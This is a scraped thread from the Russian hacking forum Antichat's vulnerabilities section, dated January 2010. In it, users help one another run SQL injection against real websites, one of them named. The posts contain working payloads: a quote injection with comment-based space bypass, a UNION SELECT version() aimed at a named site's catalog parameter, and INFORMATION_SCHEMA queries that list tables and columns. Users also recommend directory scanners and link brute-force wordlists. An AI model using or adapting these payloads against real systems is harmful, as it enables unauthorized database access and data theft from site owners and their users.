ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11321  
Старый 22.01.2010, 13:59
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от v1d0qz  
Почему же?))
Сайт конечно не кислый с таким количеством тиц и таким возрастом домена

По теме. Щас уезжаю, потому доковырять не успею. Пока успел вывести только правильный запрос.
?script=%2527/**/and/**/1=1#
ну или так если с выводом..
?script=%2527/**/and/**/1=%25271
Потом, дубли организовать пока не удалось, выбивает 'Error Column 'table_name' in field list is ambiguous in', возможно из за того что до этого стоит ещё 2 или 3 join, а возможно и фикс, что за ошибка разберусь когда прийду, потому как раньше у меня такой ещё небыло. Далее.., там запятая косит запрос, потому блинд огранизовать пока не удалось. Если реально как-то сделать без запятых, я внимательно слушаю
зы. Так как это LIKE, то обрывать нужно через #, а пробелы как вы наверное заметили я заменил на /**/
зы2. Через post всё аналогично.
ну спс буду поковырят, если что составиш правильный запрос жду резултатов.
Вот тока не пойму как можно выводит sql запросы на браузер, тоесть что отправлю через гет пост и на какой запрос превращается
 
Ответить с цитированием

  #11322  
Старый 22.01.2010, 14:07
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

не могу подобрать именя таблиц и столбцов в 4ой версии (П.С. вывод виден только в исходном коде стр.), нужна Ваша помощь

Цитата:
http://elmash-holding.ru/elmcatalog/?subclass=-42+union+select+1,version()--
 
Ответить с цитированием

  #11323  
Старый 22.01.2010, 14:10
Аватар для erolom
erolom
Познающий
Регистрация: 14.03.2009
Сообщений: 38
Провел на форуме:
250929

Репутация: 2
Отправить сообщение для erolom с помощью ICQ
По умолчанию

Не подскажите пожалуйста хороший сканер для директорий сайта ..?
 
Ответить с цитированием

  #11324  
Старый 22.01.2010, 14:17
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

erolom, security-digger.org
 
Ответить с цитированием

  #11325  
Старый 22.01.2010, 15:02
Аватар для krypt3r
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

wolmer, смахивает на DLE
 
Ответить с цитированием

  #11326  
Старый 22.01.2010, 15:02
Аватар для Alf0x0ns
Alf0x0ns
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009

Репутация: 18
По умолчанию

 
Ответить с цитированием

  #11327  
Старый 22.01.2010, 19:49
Аватар для G4bR1eL
G4bR1eL
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034

Репутация: 3
По умолчанию

х3, думаю покатит

Последний раз редактировалось G4bR1eL; 22.01.2010 в 23:47..
 
Ответить с цитированием

  #11328  
Старый 22.01.2010, 20:14
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от G4bR1eL  
'1' UNION SELECT 1,TABLE_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.TABLES --
Вывело список таблиц, причем всех

'1' UNION SELECT 1, COLUMN_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='TABLE' LIMIT 2,1 --
TABLE также пробовал в hex виде (0х***)

Выскакивает при попытке подать запрос следующее:

com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorEx ception: Unknown column '*!?TABLE*!?' in 'where clause'

Я так понимаю перебирать только вручную поможет?
проверь имя таблицы
 
Ответить с цитированием

  #11329  
Старый 22.01.2010, 20:15
Аватар для MaSTeR GэN
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию

2erolom DirBuster написан на Java лудшего пока не встречал в коплекте огромные словари
 
Ответить с цитированием

  #11330  
Старый 22.01.2010, 20:57
Аватар для Ugol
Ugol
Познающий
Регистрация: 26.12.2009
Сообщений: 66
Провел на форуме:
70384

Репутация: -25
По умолчанию

словарик..http://www.chestor92.ru/publ/slovari_dlja_bruta/1-1-0-47
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ